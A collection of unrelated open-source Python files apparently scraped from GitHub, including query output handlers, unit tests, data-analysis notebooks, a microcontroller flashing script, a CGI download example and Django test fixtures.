prs["order by"], prs["limit"], prs["offset"]
)
return DelayedOutSortAtEnd(prs["order by"], prs["limit"], prs["offset"])
if prs["distinct"]:
return LineInDistinctLineOut(prs["limit"], prs["offset"])
return LineInLineOut(prs["limit"], prs["offset"])
def __init__(self, limit, offset):
self.limit = limit
self.rows_written = 0
self.offset = offset if offset else 0
def set_writer(self, writer):
self.writer = writer
def handle_result(self, result, group_key, sort_keys):
"""
To be implemented by child classes to handle a new output row (aka result).
All inputs should be tuples.
"""
return self.is_done()
def is_done(self):
# premature ending
return self.limit is not None and self.rows_written >= self.limit
def write(self, row):
if self.offset > 0:
self.offset = self.offset - 1
else:
self.writer.writerow(row)
self.rows_written = self.rows_written + 1
def finish(self):
self.writer.flush()
class LineInLineOut(OutputHandler):
"""Simple handler that immediately writes every processed row"""
def handle_result(self, result, *_):
self.write(result)
return self.is_done()
def finish(self):
super().finish()
class LineInDistinctLineOut(OutputHandler):
"""In-memory distinct handler that immediately writes every non-duplicated row"""
def __init__(self, limit, offset):
super().__init__(limit, offset)
self.output_rows = set()
def handle_result(self, result, *_):
# uses a dict to store distinct results instead of storing all rows
if result in self.output_rows:
return False # duplicate
self.output_rows.add(result)
self.write(result)
return self.is_done()
def finish(self):
super().finish()
class DelayedOutSortAtEnd(OutputHandler):
"""
Only writes after collecting and sorting all data.
Temporary implementation that reads every processed row into memory.
"""
def __init__(self, orderby, limit, offset):
super().__init__(limit, offset)
self.orderby = orderby
self.output_rows = []
def handle_result(self, result, sort_keys, *_):
self.output_rows.append({"data": result, "sort_keys": sort_keys})
# TODO use temporary files to write `output_rows` whenever it gets too large
# TODO sort intermediate results before writing to a temporary file
return False # no premature endings here
def finish(self):
# TODO read and merge previously sorted temporary files (look into heapq.merge)
# 1. sorts everything
if self.orderby:
for i in reversed(range(len(self.orderby))):
# taking advantage of list.sort being stable to sort elements from minor
# to major criteria (not be the most efficient way but straightforward)
self.output_rows.sort(
key=lambda row: (
# handle of NULLs based on NULLS FIRST/LAST specification
(row["sort_keys"][i] is Null) != self.orderby[i]["rev_nulls"],
row["sort_keys"][i],
),
reverse=self.orderby[i]["rev"], # handles ASC/DESC order
)
# 2. writes sorted rows to output
for row in self.output_rows:
# it would be more efficient to slice `output_rows` based on limit/offset
# however, this is more generic with less repeated logic and this is a
# temporary implementation
if self.is_done():
break
self.write(row["data"])
super().finish()
class GroupByDelayedOutSortAtEnd(DelayedOutSortAtEnd):
"""
Extends `DelayedOutSortAtEnd` to only store intermediate group by results instead of
keeping all rows in memory
"""
def __init__(self, orderby, limit, offset):
super().__init__(orderby, limit, offset)
self.output_rows = dict()
def handle_result(self, result, sort_keys, group_key):
# uses a dict to store intermidiate group by results instead of storing all rows
self.output_rows[group_key] = {"data": result, "sort_keys": sort_keys}
return False # no premature endings here
def finish(self):
# converts output_rows dict to list so that it can be sorted and written
self.output_rows = list(self.output_rows.values())
super().finish()
class DistinctDelayedOutSortAtEnd(DelayedOutSortAtEnd):
"""
Alters `DelayedOutSortAtEnd` to only store distinct results instead of
keeping all rows in memory
"""
def __init__(self, orderby, limit, offset):
super().__init__(orderby, limit, offset)
self.output_rows = dict()
def handle_result(self, result, sort_keys, *_):
# uses a dict to store distinct results instead of storing all rows
if result not in self.output_rows:
self.output_rows[result] = sort_keys
return False # no premature endings here
def finish(self):
# converts output_rows dict to list so that it can be sorted and written
self.output_rows = [
{"data": k, "sort_keys": v} for k, v in self.output_rows.items()
]
super().finish()
|
tests/gamestonk_terminal/stocks/quantitative_analysis/test_factors_view.py
|
elan17/GamestonkTerminal
| 1,835 |
63326
|
<filename>tests/gamestonk_terminal/stocks/quantitative_analysis/test_factors_view.py<gh_stars>1000+
# IMPORTATION STANDARD
# IMPORTATION THIRDPARTY
import pytest
# IMPORTATION INTERNAL
from gamestonk_terminal.stocks.quantitative_analysis import factors_view
@pytest.fixture(scope="module")
def vcr_config():
return {
"filter_headers": [("User-Agent", None)],
"filter_query_parameters": [
("period1", "1598220000"),
("period2", "1635980400"),
],
}
@pytest.mark.vcr
@pytest.mark.record_stdout
def test_capm_view():
factors_view.capm_view(ticker="PM")
|
wikum/statistics/analyze_initiators.py
|
xuericlin/wikum
| 114 |
63375
|
<reponame>xuericlin/wikum
from __future__ import print_function
# coding: utf-8
# In[1]:
from builtins import zip
get_ipython().magic(u'matplotlib inline')
import MySQLdb
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams["figure.figsize"] = [20,12]
# In[2]:
conn = MySQLdb.connect(host='localhost', user='root', passwd='<PASSWORD>', db='wikumnewdb')
cursor = conn.cursor()
# In[3]:
cursor.execute("select text, username, website_comment.created_at, url from website_opencomment INNER JOIN website_article on website_opencomment.article_id = website_article.id INNER JOIN website_commentauthor on website_opencomment.author_id = website_commentauthor.id INNER JOIN website_comment on website_opencomment.comment_id = website_comment.id")
rows = cursor.fetchall()
# In[9]:
# How many RfCs are opened per month?
open_dates = [data[2] for data in rows]
df = pd.DataFrame(index=open_dates)
df['count'] = [1]*len(open_dates)
resampled_df = df.resample('1M', label='right').sum()
# In[5]:
fig, ax = plt.subplots()
ax.plot(resampled_df.index, resampled_df['count'])
fig.suptitle('RfCs initiated', fontsize=20, fontweight='bold',y=0.05)
years = plt.matplotlib.dates.YearLocator()
months = plt.matplotlib.dates.MonthLocator(interval=3)
yearsFmt = plt.matplotlib.dates.DateFormatter('%Y')
monthsFmt = plt.matplotlib.dates.DateFormatter('%b')
ax.xaxis.set_major_locator(years)
ax.xaxis.set_major_formatter(yearsFmt)
ax.xaxis.set_minor_locator(months)
ax.xaxis.set_minor_formatter(monthsFmt)
ax.set_xlabel("Date")
ax.set_ylabel("Number of RfCs initiated")
ax.xaxis.grid(True)
ax.yaxis.grid(True)
labels = ax.get_xticklabels() #"both" gives ugly formatting
plt.setp(labels, rotation=30, fontsize=15)
for xy in zip(resampled_df.index, resampled_df['count']):
ax.annotate(xy[1], xy=xy, textcoords='data')
plt.show()
# In[6]:
# Maximum RfCs initiated in a month
resampled_df.idxmax()
resampled_df.max()
print(int(resampled_df.max()))
# In[7]:
# Top openers
df = pd.DataFrame( [[ij for ij in i] for i in rows] )
df.rename(columns={0:'text', 1:'user name', 2:'date', 3:'url'}, inplace=True)
opening_counts = pd.DataFrame(df.groupby('user name').size().rename('total openings'))
opening_counts.sort_values(by='total openings', ascending=False, inplace=True)
opening_counts.iloc[0:30]
# In[ ]:
|
experimental/gradient_noise/plot_noise.py
|
Pandinosaurus/KungFu
| 291 |
63386
|
<filename>experimental/gradient_noise/plot_noise.py
import re
import matplotlib
import matplotlib.cm as cm
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import numpy as np
# Regex used to match relevant loglines (in this case, a specific IP address)
line_regex = re.compile(r".*$")
def get_experiment_results(log_file, match_function):
results = []
with open(log_file, "r") as in_file:
for line in in_file:
if (line_regex.search(line)):
match = match_function(line)
if match is not None:
results.append(match)
return results
def extract_from_worker(s, from_worker):
pattern = re.compile(r"\[.*/0" + str(from_worker) + r"/.*\].*", re.VERBOSE)
match = pattern.match(s)
if match is None:
return None
return s
def print_none_match(pattern, l):
print(pattern.pattern)
raise Exception(l)
def get_loss(s):
pattern = re.compile(r".*\)\t(?P<loss>\d+\.\d+)\t.*", re.VERBOSE)
match = pattern.match(s)
if match is None:
return None
return float(match.group("loss"))
def get_noise(s):
pattern = re.compile(r".*iteration\[(?P<noise>[\-\+]?\d+\.\d+)\]\n",
re.VERBOSE)
match = pattern.match(s)
if match is None:
return None
return float(match.group("noise"))
def plot(lines):
losses = [get_loss(l) for l in lines]
losses = filter(None, losses)
noises = [get_noise(l) for l in lines]
noises = filter(None, noises)
pairs = zip(losses, noises)
pairs.sort(key=lambda x: x[0])
print(pairs)
losses, noises = zip(*pairs)
plt.ylim([-200000, 200000])
plt.title('ResNet-32 gradient noise scale')
plt.ylabel('Gradient Noise')
plt.xlabel('Training Loss')
plt.plot(losses, noises)
plt.show()
def main():
num_workers = 1
workers = []
for worker in range(num_workers):
worker = get_experiment_results(
'./correctnoise-tensorboard.log',
lambda x: extract_from_worker(x, worker))
workers.append(worker)
for worker_logs in workers:
plot(worker_logs)
if __name__ == "__main__":
main()
|
python/intro.py
|
surabhi226005/functional-programming-learning-path
| 627 |
63389
|
# Assign functions to a variable
def add(a, b):
return a + b
plus = add
value = plus(1, 2)
print(value) # 3
# Lambda
value = (lambda a, b: a + b)(1, 2)
print(value) # 3
addition = lambda a, b: a + b
value = addition(1, 2)
print(value) # 3
authors = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>'
]
sorted_authors_by_name_length = sorted(authors, key=len)
print(sorted_authors_by_name_length)
sorted_authors_by_last_name = sorted(authors, key=lambda name: name.split()[-1])
print(sorted_authors_by_last_name)
|
basic-example/test.py
|
tr4r3x/remora
| 206 |
63409
|
#!/usr/bin/python
import requests
def check():
data = {}
consumers = requests.get('http://localhost:9000/consumers').json()
for consumer_group in consumers:
consumer_infos = requests.get(
'http://localhost:9000/consumers/{consumer_group}'.format(
consumer_group=consumer_group)).json()
for partition in consumer_infos['partition_assignment']:
data[
'{consumer_group}-{topic}-{partition}-lag'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['lag']
data[
'{consumer_group}-{topic}-{partition}-log_end_offset'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['log_end_offset']
data[
'{consumer_group}-{topic}-{partition}-offset'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['offset']
print(data)
return data
if __name__ == "__main__":
check()
|
flexbe_core/test/test_proxies.py
|
duwke/flexbe_behavior_engine
| 119 |
63430
|
<reponame>duwke/flexbe_behavior_engine<gh_stars>100-1000
#!/usr/bin/env python
import unittest
import rospy
import actionlib
from flexbe_core.proxy import ProxyPublisher, ProxySubscriberCached, ProxyActionClient, ProxyServiceCaller
from std_msgs.msg import String
from std_srvs.srv import Trigger, TriggerRequest
from flexbe_msgs.msg import BehaviorExecutionAction, BehaviorExecutionGoal, BehaviorExecutionResult
class TestProxies(unittest.TestCase):
def test_publish_subscribe(self):
t1 = '/pubsub_1'
t2 = '/pubsub_2'
pub = ProxyPublisher({t1: String})
pub = ProxyPublisher({t2: String}, _latch=True)
sub = ProxySubscriberCached({t1: String})
self.assertTrue(pub.is_available(t1))
self.assertTrue(pub.wait_for_any(t1))
self.assertFalse(pub.wait_for_any(t2))
pub.publish(t1, String('1'))
pub.publish(t2, String('2'))
rospy.sleep(.5) # make sure latched message is sent before subscriber is added
sub = ProxySubscriberCached({t2: String})
rospy.sleep(.5) # make sure latched message can be received before checking
self.assertTrue(sub.has_msg(t1))
self.assertEqual(sub.get_last_msg(t1).data, '1')
sub.remove_last_msg(t1)
self.assertFalse(sub.has_msg(t1))
self.assertIsNone(sub.get_last_msg(t1))
self.assertTrue(sub.has_msg(t2))
self.assertEqual(sub.get_last_msg(t2).data, '2')
def test_subscribe_buffer(self):
t1 = '/buffered_1'
pub = ProxyPublisher({t1: String})
sub = ProxySubscriberCached({t1: String})
sub.enable_buffer(t1)
self.assertTrue(pub.wait_for_any(t1))
pub.publish(t1, String('1'))
pub.publish(t1, String('2'))
rospy.sleep(.5) # make sure messages can be received
self.assertTrue(sub.has_msg(t1))
self.assertTrue(sub.has_buffered(t1))
self.assertEqual(sub.get_from_buffer(t1).data, '1')
pub.publish(t1, String('3'))
rospy.sleep(.5) # make sure messages can be received
self.assertEqual(sub.get_from_buffer(t1).data, '2')
self.assertEqual(sub.get_from_buffer(t1).data, '3')
self.assertIsNone(sub.get_from_buffer(t1))
self.assertFalse(sub.has_buffered(t1))
def test_service_caller(self):
t1 = '/service_1'
rospy.Service(t1, Trigger, lambda r: (True, 'ok'))
srv = ProxyServiceCaller({t1: Trigger})
result = srv.call(t1, TriggerRequest())
self.assertIsNotNone(result)
self.assertTrue(result.success)
self.assertEqual(result.message, 'ok')
self.assertFalse(srv.is_available('/not_there'))
srv = ProxyServiceCaller({'/invalid': Trigger}, wait_duration=.1)
self.assertFalse(srv.is_available('/invalid'))
def test_action_client(self):
t1 = '/action_1'
server = None
def execute_cb(goal):
rospy.sleep(.5)
if server.is_preempt_requested():
server.set_preempted()
else:
server.set_succeeded(BehaviorExecutionResult(outcome='ok'))
server = actionlib.SimpleActionServer(t1, BehaviorExecutionAction, execute_cb, auto_start=False)
server.start()
client = ProxyActionClient({t1: BehaviorExecutionAction})
self.assertFalse(client.has_result(t1))
client.send_goal(t1, BehaviorExecutionGoal())
rate = rospy.Rate(20)
for i in range(20):
self.assertTrue(client.is_active(t1) or client.has_result(t1))
rate.sleep()
self.assertTrue(client.has_result(t1))
result = client.get_result(t1)
self.assertEqual(result.outcome, 'ok')
client.send_goal(t1, BehaviorExecutionGoal())
rospy.sleep(.1)
client.cancel(t1)
rospy.sleep(.9)
self.assertFalse(client.is_active(t1))
self.assertFalse(client.is_available('/not_there'))
client = ProxyActionClient({'/invalid': BehaviorExecutionAction}, wait_duration=.1)
self.assertFalse(client.is_available('/invalid'))
if __name__ == '__main__':
rospy.init_node('test_flexbe_proxies')
import rostest
rostest.rosrun('flexbe_core', 'test_flexbe_proxies', TestProxies)
|
tests/test_activations.py
|
themantalope/DLTK
| 1,397 |
63441
|
import tensorflow as tf
from dltk.core.activations import leaky_relu
import numpy as np
def test_leaky_relu():
test_alpha = tf.constant(0.1)
test_inp_1 = tf.constant(1.)
test_inp_2 = tf.constant(-1.)
test_relu_1 = leaky_relu(test_inp_1, test_alpha)
test_relu_2 = leaky_relu(test_inp_2, test_alpha)
with tf.Session() as s:
out_1 = s.run(test_relu_1)
assert np.isclose(out_1, 1.), \
'Got {} but expected {}'.format(out_1, 1.)
out_2 = s.run(test_relu_2)
assert np.isclose(out_2, -0.1), \
'Got {} but expected {}'.format(out_2, -0.1)
|
text_extensions_for_pandas/array/thing_table.py
|
ZachEichen/text-extensions-for-pandas
| 193 |
63468
|
#
# Copyright (c) 2021 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import textwrap
#
# thing_table.py
#
# Part of text_extensions_for_pandas
#
# Data structure for managing collections of immutable items that implement
# __hash__ and __eq__. Serves as a base class for StringTable
#
from abc import ABC, abstractmethod
from typing import *
import numpy as np
class ThingTable(ABC):
"""
A set of immutable things, plus integer IDs for said things.
Also implicitly maps `None` to ID -1.
Serves as a base class for collections of specific things like strings and
tokenizations.
"""
# Special integer ID for None as a thing.
NONE_ID = -1
# Special integer ID for "not an id"
NOT_AN_ID = -2
def __init__(self):
# Bidirectional map from unique thing (possibly boxed for dictionary
# compatibility) to integer ID and back
self._boxed_thing_to_id = {} # type: Dict[Any, int]
self._id_to_boxed_thing = [] # type: List[Any]
self._total_bytes = 0 # type: int
@abstractmethod
def size_of_thing(self, thing: Any) -> int:
"""
:param thing: Thing to be insterted in this table
:return: The number of bytes that the thing occupies in memory
"""
pass
@abstractmethod
def type_of_thing(self) -> Type:
"""
:return: Expected type of things that this table will manage
"""
pass
def box(self, thing: Any) -> Any:
"""
Subclasses should override this method if they manage items that aren't
compatible with Python dictionaries.
:param thing: Thing to insert into the table
:return: a dictionary-compatible boxed version of `thing`, if such boxing
is needed to make `thing` dictionary-compatible.
"""
# Default implementation is a no-op
return thing
def unbox(self, boxed_thing: Any) -> Any:
"""
Subclasses should override this method if they manage items that aren't
compatible with Python dictionaries.
:param boxed_thing: Thing that was boxed by this class's `box` method.
:return: Original thing that was passed to `box`
"""
# Default implementation is a no-op
return boxed_thing
@classmethod
def create_single(cls, thing: Any):
"""
Factory method for building a table containing a single value at ID 0.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
"""
# For now we return a fresh table each time.
ret = cls()
ret.maybe_add_thing(thing)
return ret
@classmethod
def merge_tables_and_ids(cls, tables: Sequence["ThingTable"],
int_ids: Sequence[np.ndarray]) \
-> Tuple["ThingTable", np.ndarray]:
"""
Factory method for combining together multiple references to different
ThingTables into references to a new, combined ThingTable of the same type.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
:param tables: A list of (possibly) different mappings from int to string
:param int_ids: List of lists of integer IDs that decode to strings via the
corresponding elements of `tables`.
:returns: A tuple containing:
* A new, merged table containing all the unique things under `tables`
that are referenced in `int_ids` (and possibly additional things that aren't
referenced)
* Numpy arrays of integer offsets into the new table, corresponding to the
elements of `int_ids`
"""
if len(tables) != len(int_ids):
raise ValueError(f"Got {len(tables)} {cls}s "
f"and {len(int_ids)} lists of IDs.")
# TODO: Add fast-path code here to pass through the first table if
# both input tables are identical.
new_table = cls()
new_ids_list = []
for i in range(len(tables)):
old_table = tables[i]
if not isinstance(old_table, cls):
raise TypeError(f"Expected table of type {cls}, but got "
f"{type(old_table)}")
old_ids = int_ids[i]
if len(old_ids.shape) != 1:
raise ValueError(f"Invalid shape for IDs {old_ids}")
new_ids = np.empty_like(old_ids, dtype=int)
old_id_to_new_id = [
new_table.maybe_add_thing(old_table.id_to_thing(j))
for j in range(old_table.num_things)
]
for j in range(len(old_ids)):
new_ids[j] = old_id_to_new_id[old_ids[j]]
new_ids_list.append(new_ids)
return new_table, new_ids_list
@classmethod
def merge_things(cls, things: Union[Sequence[Any], np.ndarray]):
f"""
Factory method for bulk-adding multiple things to create a single
ThingTable and a list of integer IDs against that ThingTable.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
:param things: things to be de-duplicated and converted to a ThingTable.
:returns: Two values:
* A ThingTable containing (at least) all the unique strings in `strings`
* A Numppy array of integer string IDs against the returned ThingTable, where
each ID maps to the corresponding element of `strings`
"""
new_table = cls()
str_ids = np.empty(len(things), dtype=int)
for i in range(len(things)):
str_ids[i] = new_table.maybe_add_thing(things[i])
return new_table, str_ids
@classmethod
def from_things(cls, things: Union[Sequence[Any], np.ndarray]):
"""
Factory method for creating a ThingTable from a sequence of unique things.
:param things: sequence of unique things to be added to the ThingTable.
:return: A ThingTable containing the elements of `things`.
"""
new_table = cls()
for thing in things:
new_table.add_thing(thing)
return new_table
def thing_to_id(self, thing: Any) -> int:
"""
:param thing: A thing to look up in this table
:returns: One of:
* The integer ID of the indicated thing, if present.
* `ThingTable.NONE_ID` if thing is None
* `ThingTable.NOT_AN_ID` if thing is not present in the table
"""
if thing is None:
# By convention, None maps to -1
return ThingTable.NONE_ID
elif not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
else:
# Remaining branches require boxing for dictionary lookup
boxed_thing = self.box(thing)
if boxed_thing not in self._boxed_thing_to_id:
return ThingTable.NOT_AN_ID
else:
return self._boxed_thing_to_id[boxed_thing]
def id_to_thing(self, int_id: Union[int, np.int64, np.int32]) -> Any:
"""
:param int_id: Integer ID that is potentially associated with a thing in the
table
:return: The associated thing, if present, or `None` if no thing is associated
with the indicated ID.
"""
if not isinstance(int_id, (int, np.int64, np.int32)):
raise TypeError(f"Expected integer, but received {int_id} "
f"of type {type(int_id)}")
elif int_id <= ThingTable.NOT_AN_ID:
raise ValueError(f"Invalid ID {int_id}")
elif ThingTable.NONE_ID == int_id:
return None
else:
boxed_thing = self._id_to_boxed_thing[int_id]
return self.unbox(boxed_thing)
def ids_to_things(self, int_ids: Union[Sequence[int], np.ndarray]) -> np.ndarray:
"""
Vectorized version of :func:`id_to_string` for translating multiple IDs
at once.
:param int_ids: Multiple integer IDs to be translated to strings
:returns: A numpy array of string objects.
"""
if not isinstance(int_ids, np.ndarray):
int_ids = np.array(int_ids, dtype=int)
if len(int_ids.shape) != 1:
raise TypeError(f"Invalid shape {int_ids.shape} for array of integer IDs.")
ret = np.empty(len(int_ids), dtype=object)
for i in range(len(int_ids)):
ret[i] = self.id_to_thing(int_ids[i].item())
return ret
def add_thing(self, thing: Any) -> int:
"""
Adds a thing to the table. Raises a ValueError if the thing is already
present.
:param thing: Thing to add
:return: unique ID for this thing
"""
if not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
# Box for dictionary compatibility
boxed_thing = self.box(thing)
if boxed_thing in self._boxed_thing_to_id:
raise ValueError(f"'{textwrap.shorten(str(thing), 40)}' already in table")
new_id = len(self._id_to_boxed_thing)
self._id_to_boxed_thing.append(boxed_thing)
self._boxed_thing_to_id[boxed_thing] = new_id
self._total_bytes += self.size_of_thing(thing)
return new_id
def maybe_add_thing(self, thing: Any) -> int:
"""
Adds a thing to the table if it is not already present.
:param thing: Thing to add
:return: unique ID for this thing
"""
if not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
current_id = self.thing_to_id(thing)
if current_id != ThingTable.NOT_AN_ID:
return current_id
else:
return self.add_thing(thing)
def maybe_add_things(self, s: Sequence[Any]) -> np.ndarray:
"""
Vectorized version of :func:`maybe_add_thing` for translating, and
potentially adding multiple things at once.
:param s: Multiple things to be translated and potentially added
:returns: A numpy array of the corresponding integer IDs for the things.
Adds each things to the table if it is not already present.
"""
result = np.empty(len(s), dtype=np.int32)
for i in range(len(result)):
result[i] = self.maybe_add_thing(s[i])
return result
def nbytes(self):
"""
Number of bytes in a (currently hypothetical) serialized version of this table.
"""
return self._total_bytes
@property
def num_things(self) -> int:
"""
:return: Number of distinct things in the table
"""
return len(self._id_to_boxed_thing)
@property
def things(self) -> Iterator[Any]:
"""
:return: Iterator over the unique things stored in this table.
"""
return (self.unbox(thing) for thing in self._id_to_boxed_thing)
@property
def ids(self) -> Iterator[int]:
"""
:return: Iterator over the IDs of things stored in this table, including the
implicit ID ThingTable.NONE_ID
"""
if ThingTable.NONE_ID != -1:
raise ValueError("Someone has changed the value of NONE_ID; need to rewrite "
"this function.")
return range(-1, len(self._id_to_boxed_thing))
def things_to_ids(self, things: Sequence[Any]) -> np.ndarray:
"""
Vectorized version of :func:`thing_to_id` for translating multiple things
at once.
:param things: Multiple things to be translated to IDs. Must be already
in the table's set of things.
:returns: A numpy array of the same integers that :func:`thing_to_id` would
return.
"""
ret = np.empty(len(things), dtype=np.int32)
for i in range(len(things)):
ret[i] = self.thing_to_id(things[i])
return ret
|
flash2560.py
|
kaleidoscopeit/esp-link
| 2,522 |
63482
|
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# <NAME> wrote this file. As long as you retain
# this notice you can do whatever you want with this stuff. If we meet some day,
# and you think this stuff is worth it, you can buy me a beer in return.
# ----------------------------------------------------------------------------
import sys
import re
import requests
import platform # For getting the operating system name
import subprocess # For executing a shell command
import os
import time
ip_regex = "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"
def main(argv):
print("--- flash2560 - Created by <NAME> ---")
hostname = "192.168.4.1"
input_file = "none"
# Handle the command line arguments
for index, arg in enumerate(argv):
if arg == "-h" or arg == "--help":
print_help()
sys.exit(0)
elif arg == "-H" or arg == "--hostname":
if index + 1 < len(argv) and re.search(ip_regex, argv[index + 1]):
hostname = argv[index + 1]
if not ping(hostname):
print("IP is not reachable:")
sys.exit(2)
else:
print("IP address is not right")
print_help()
sys.exit(1)
elif arg == "-f" or arg == "--file":
if index + 1 < len(argv) and os.path.isfile(argv[index + 1]):
input_file = argv[index + 1]
else:
print("Can't open file")
print_help()
sys.exit(3)
if input_file == "none":
print("No input file")
print_help()
sys.exit(4)
response = requests.post('http://' + hostname + '/pgmmega/sync')
# ------------ GET AVR in SYNC ----------------------------------------
if response.status_code != 204:
print("Failed to reset the AVR (HTML ERROR: " + response.status_code + ")")
sys.exit(5)
while True:
response = requests.get('http://' + hostname + '/pgmmega/sync')
if "SYNC" in response.content.decode('ASCII'):
print(response.content)
break
elif "NOT READY" not in response.content.decode('ASCII'):
print("Could not get in Sync with AVR")
sys.exit(7)
time.sleep(0.1)
# -------------- Upload HEX file -----------------------------------------
hex_file = open(input_file).read()
response = requests.post('http://' + hostname + '/pgmmega/upload', data=hex_file, timeout=20.0)
if "Success" in response.content.decode('ASCII'):
print("+++++ Success :) ++++++")
else:
print("Failed :(")
sys.exit(8)
# Reset the avr to solve a bug in the bootloader that the program dows not start immediately
time.sleep(0.1)
requests.post('http://' + hostname + '/console/reset')
sys.exit(0)
def print_help():
print('\n')
print("Usage: ")
print("flash2560.py -H <hostname> -f <hex_file>")
print("\nExample:")
print("flash2560.py -H 192.168.4.1 -f Sketch.hex")
def ping(host):
param = '-n' if platform.system().lower() == 'windows' else '-c'
command = ['ping', param, '1', host]
output = open(os.devnull, 'w')
return subprocess.call(command, stdout=output) == 0
if __name__ == "__main__":
main(sys.argv[1:])
|
openbook_categories/serializers.py
|
TamaraAbells/okuna-api
| 164 |
63484
|
from rest_framework import serializers
from openbook_categories.models import Category
class GetCategoriesCategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = (
'id',
'name',
'title',
'description',
'avatar',
'color'
)
|
lightnlp/sl/ner/utils/convert.py
|
CNLPT/lightNLP
| 889 |
63490
|
def iob_ranges(words, tags):
"""
IOB -> Ranges
"""
assert len(words) == len(tags)
ranges = []
def check_if_closing_range():
if i == len(tags) - 1 or tags[i + 1].split('_')[0] == 'O':
ranges.append({
'entity': ''.join(words[begin: i + 1]),
'type': temp_type,
'start': begin,
'end': i
})
for i, tag in enumerate(tags):
if tag.split('_')[0] == 'O':
pass
elif tag.split('_')[0] == 'B':
begin = i
temp_type = tag.split('_')[1]
check_if_closing_range()
elif tag.split('_')[0] == 'I':
check_if_closing_range()
return ranges
|
CGI/simple-server-with-different-languages/cgi-bin/download.py
|
whitmans-max/python-examples
| 140 |
63557
|
<filename>CGI/simple-server-with-different-languages/cgi-bin/download.py
#!/usr/bin/env python
import os
import sys
fullpath = 'images/normal.png'
filename = 'hello_world.png'
# headers
print 'Content-Type: application/octet-stream; name="%s"' % filename
print 'Content-Disposition: attachment; filename="%s"' % filename
print "Content-Length: " + str(os.stat(fullpath).st_size)
print # empty line between headers and body
#sys.stdout.flush() # send header faster
try:
# body
with open(fullpath, 'rb') as fo:
print fo.read()
except Exception as e:
print 'Content-type:text/html'
print # empty line between headers and body
print 'Exception:', e
|
foreman/data_refinery_foreman/foreman/management/commands/test_import_external_sample_attributes.py
|
AlexsLemonade/refinebio
| 106 |
63570
|
from unittest.mock import patch
from django.test import TestCase
import vcr
from data_refinery_common.models import (
Contribution,
Experiment,
ExperimentSampleAssociation,
OntologyTerm,
Sample,
SampleAttribute,
)
from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import (
Command,
import_metadata,
import_sample_attributes,
)
TEST_METADATA = "/home/user/data_store/externally_supplied_metadata/test_data/metadata.json"
class ImportExternalSampleAttributesTestCase(TestCase):
def setUp(self):
experiment = Experiment()
experiment.accession_code = "GSE000"
experiment.alternate_accession_code = "E-GEOD-000"
experiment.title = "NONONONO"
experiment.description = "Boooooourns. Wasabi."
experiment.technology = "RNA-SEQ"
experiment.save()
self.experiment = experiment
# Create some samples to attach metadata to
sample = Sample()
sample.accession_code = "SRR123"
sample.technology = "RNA-SEQ"
sample.source_database = "SRA"
sample.title = "Not important"
sample.save()
experiment_sample_association = ExperimentSampleAssociation()
experiment_sample_association.sample = sample
experiment_sample_association.experiment = experiment
experiment_sample_association.save()
sample2 = Sample()
sample2.accession_code = "SRR456"
sample2.technology = "RNA-SEQ"
sample2.source_database = "SRA"
sample2.title = "Not important"
sample2.save()
experiment_sample_association = ExperimentSampleAssociation()
experiment_sample_association.sample = sample2
experiment_sample_association.experiment = experiment
experiment_sample_association.save()
# Create the ontology terms I'm using in the tests
name = OntologyTerm()
name.ontology_term = "PATO:0000122"
name.human_readable_name = "length"
name.save()
unit = OntologyTerm()
unit.ontology_term = "UO:0010012"
unit.human_readable_name = "thou"
unit.save()
contribution = Contribution()
contribution.source_name = "refinebio_tests"
contribution.methods_url = "ccdatalab.org"
contribution.save()
self.contribution = contribution
#
# Test import_sample_attributes()
#
def test_skip_unknown_sample(self):
"""Make sure that if someone has metadata for a sample that we haven't
surveyed then we just do nothing"""
METADATA = [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}]
import_sample_attributes("SRR789", METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 0)
def test_import_invalid_ontology_term(self):
METADATA = [{"PATO:0000122": {"value": 25, "unit": "thou"}}]
self.assertRaises(
ValueError, import_sample_attributes, "SRR123", METADATA, self.contribution
)
METADATA = [{"length": {"value": 25, "unit": "UO:0010012"}}]
self.assertRaises(
ValueError, import_sample_attributes, "SRR123", METADATA, self.contribution
)
def test_import_valid_sample_attributes(self):
METADATA = [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}]
import_sample_attributes("SRR123", METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = Sample.objects.get(accession_code="SRR123").contributed_metadata
self.assertEqual(
contributed_metadata[self.contribution.source_name]["length"],
{"unit": "thou", "value": 25},
)
#
# Test import_metadata()
#
def test_import_valid_metadata(self):
METADATA = [
{
"sample_accession": "SRR123",
"attributes": [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}],
}
]
import_metadata(METADATA, self.contribution)
